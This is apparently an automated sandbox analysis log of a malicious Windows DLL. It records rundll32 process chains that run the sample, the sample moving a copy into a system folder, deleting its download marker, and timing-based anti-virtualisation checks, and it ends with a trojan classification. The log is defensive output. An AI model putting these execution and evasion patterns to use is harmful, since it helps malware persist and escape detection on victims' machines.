Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B22A46	5_2_00B22A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B23845	5_2_00B23845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2A048	5_2_00B2A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B37BB2	5_2_00B37BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2BFB6	5_2_00B2BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3B1B5	5_2_00B3B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B32FA2	5_2_00B32FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B39DA1	5_2_00B39DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B34BAA	5_2_00B34BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2FD91	5_2_00B2FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3B397	5_2_00B3B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B41193	5_2_00B41193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3D99A	5_2_00B3D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B29384	5_2_00B29384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B24F8E	5_2_00B24F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2758F	5_2_00B2758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B34D8D	5_2_00B34D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B403F1	5_2_00B403F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2C5FE	5_2_00B2C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3BFE8	5_2_00B3BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2A3DF	5_2_00B2A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B26FC4	5_2_00B26FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B425C3	5_2_00B425C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B40B34	5_2_00B40B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B25923	5_2_00B25923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B26B25	5_2_00B26B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B4292B	5_2_00B4292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3FD10	5_2_00B3FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2251C	5_2_00B2251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B23502	5_2_00B23502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B22309	5_2_00B22309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3577E	5_2_00B3577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B31F6B	5_2_00B31F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3056A	5_2_00B3056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B2C158	5_2_00B2C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B23F5C	5_2_00B23F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B23345	5_2_00B23345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B41343	5_2_00B41343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B3F14D	5_2_00B3F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBECE3	14_2_00EBECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA30F6	14_2_00EA30F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBDEF4	14_2_00EBDEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB7ED1	14_2_00EB7ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC08D1	14_2_00EC08D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB44AA	14_2_00EB44AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB78A5	14_2_00EB78A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA5AB2	14_2_00EA5AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB748A	14_2_00EB748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAAC95	14_2_00EAAC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA2043	14_2_00EA2043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA3845	14_2_00EA3845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB5220	14_2_00EB5220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAEC27	14_2_00EAEC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBF83F	14_2_00EBF83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA220A	14_2_00EA220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA441E	14_2_00EA441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA55E8	14_2_00EA55E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAC5FE	14_2_00EAC5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB4BAA	14_2_00EB4BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB2FA2	14_2_00EB2FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA758F	14_2_00EA758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA9384	14_2_00EA9384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC0B34	14_2_00EC0B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBAEEB	14_2_00EBAEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBA8F0	14_2_00EBA8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBBEC9	14_2_00EBBEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB0ADE	14_2_00EB0ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBCCD4	14_2_00EBCCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBCAA8	14_2_00EBCAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EADAAE	14_2_00EADAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAFEA0	14_2_00EAFEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBD6A7	14_2_00EBD6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB90BA	14_2_00EB90BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB98BD	14_2_00EB98BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB4E8A	14_2_00EB4E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EACC8D	14_2_00EACC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA7283	14_2_00EA7283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC0687	14_2_00EC0687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBAC9B	14_2_00EBAC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBD091	14_2_00EBD091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA3C91	14_2_00EA3C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB406E	14_2_00EB406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA1C76	14_2_00EA1C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAA048	14_2_00EAA048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBE441	14_2_00EBE441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA2A46	14_2_00EA2A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA9A57	14_2_00EA9A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA2654	14_2_00EA2654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA9E22	14_2_00EA9E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAD223	14_2_00EAD223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC1A3C	14_2_00EC1A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA1A0A	14_2_00EA1A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA8C09	14_2_00EA8C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA4C00	14_2_00EA4C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAF41F	14_2_00EAF41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAE21C	14_2_00EAE21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB1C10	14_2_00EB1C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBBFE8	14_2_00EBBFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC03F1	14_2_00EC03F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA6FC4	14_2_00EA6FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC25C3	14_2_00EC25C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAA3DF	14_2_00EAA3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB9DA1	14_2_00EB9DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB43B3	14_2_00EB43B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB7BB2	14_2_00EB7BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EABFB6	14_2_00EABFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBB1B5	14_2_00EBB1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA4F8E	14_2_00EA4F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB4D8D	14_2_00EB4D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBD99A	14_2_00EBD99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAFD91	14_2_00EAFD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBB397	14_2_00EBB397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC1193	14_2_00EC1193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB1F6B	14_2_00EB1F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB056A	14_2_00EB056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB577E	14_2_00EB577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBF14D	14_2_00EBF14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA3345	14_2_00EA3345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC1343	14_2_00EC1343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EAC158	14_2_00EAC158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA3F5C	14_2_00EA3F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EC292B	14_2_00EC292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA5923	14_2_00EA5923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA6B25	14_2_00EA6B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA2309	14_2_00EA2309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA3502	14_2_00EA3502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA251C	14_2_00EA251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EBFD10	14_2_00EBFD10

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E9C5BE0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E9C5BE0 appears 46 times

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9B13F0 zwxnlwalmcbgmt,		0_2_6E9B13F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9B13F0 zwxnlwalmcbgmt,		2_2_6E9B13F0

Source: wNjqkrm8pH.dll

Binary or memory string: OriginalFilenameErulfuaekg.dll6 vs wNjqkrm8pH.dll

Source: wNjqkrm8pH.dll

Virustotal: Detection: 24%

Source: wNjqkrm8pH.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,abziuleoxsborpb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,aejkroaebsbxdnkhb
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie",cwqsUWjgRvl
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Hsngzdtsiohsyp\jlodhhplzusb.iie",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,abziuleoxsborpb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,aejkroaebsbxdnkhb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie",cwqsUWjgRvl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Hsngzdtsiohsyp\jlodhhplzusb.iie",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@27/0@0/21

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9C3C90 CoCreateInstance,

0_2_6E9C3C90

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_00EB1B54 CreateToolhelp32Snapshot,

14_2_00EB1B54

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,Control_RunDLL

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9BEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

0_2_6E9BEBD0

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: wNjqkrm8pH.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: wNjqkrm8pH.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wNjqkrm8pH.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wNjqkrm8pH.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wNjqkrm8pH.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wNjqkrm8pH.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01041229 push eax; retf	0_2_0104129A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9C5C26 push ecx; ret	0_2_6E9C5C39
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E8067 push ecx; ret	0_2_6E9E807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00CF1229 push eax; retf	2_2_00CF129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9C5C26 push ecx; ret	2_2_6E9C5C39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9E8067 push ecx; ret	2_2_6E9E807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03231229 push eax; retf	3_2_0323129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_00B21229 push eax; retf	5_2_00B2129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EA1229 push eax; retf	14_2_00EA129A

Source: wNjqkrm8pH.dll

Static PE information: real checksum: 0x81586 should be: 0x815b6

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9C7C47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6E9C7C47

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E9B6672 second address: 000000006E9B66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF1C9086B21h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E9B8A23 second address: 000000006E9B8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF1C90F2E9Eh 0x00000007 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E9B6672 second address: 000000006E9B66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF1C9086B21h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E9B8A23 second address: 000000006E9B8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF1C90F2E9Eh 0x00000007 rdtscp

Source: C:\Windows\System32\svchost.exe TID: 6596

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9B6620 rdtscp

0_2_6E9B6620

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9DD1EE FindFirstFileExA,	0_2_6E9DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9DD1EE FindFirstFileExA,	2_2_6E9DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB1A80 FindFirstFileW,	14_2_00EB1A80

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000019.00000002.631623148.0000025AA8CEB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000019.00000002.631552535.0000025AA8C81000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9CED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E9CED41

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9C849D IsProcessorFeaturePresent,GetProcessHeap,HeapAlloc,InitializeSListHead,GetProcessHeap,HeapFree,

0_2_6E9C849D

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9B6620 rdtscp

0_2_6E9B6620

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105DE10 mov eax, dword ptr fs:[00000030h]	0_2_0105DE10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9B6620 mov ecx, dword ptr fs:[00000030h]	0_2_6E9B6620
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9C849D mov esi, dword ptr fs:[00000030h]	0_2_6E9C849D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9B6510 mov eax, dword ptr fs:[00000030h]	0_2_6E9B6510
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9B8A50 mov eax, dword ptr fs:[00000030h]	0_2_6E9B8A50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9D69AA mov eax, dword ptr fs:[00000030h]	0_2_6E9D69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00D0DE10 mov eax, dword ptr fs:[00000030h]	2_2_00D0DE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9B6620 mov ecx, dword ptr fs:[00000030h]	2_2_6E9B6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9C849D mov esi, dword ptr fs:[00000030h]	2_2_6E9C849D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9B6510 mov eax, dword ptr fs:[00000030h]	2_2_6E9B6510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9B8A50 mov eax, dword ptr fs:[00000030h]	2_2_6E9B8A50
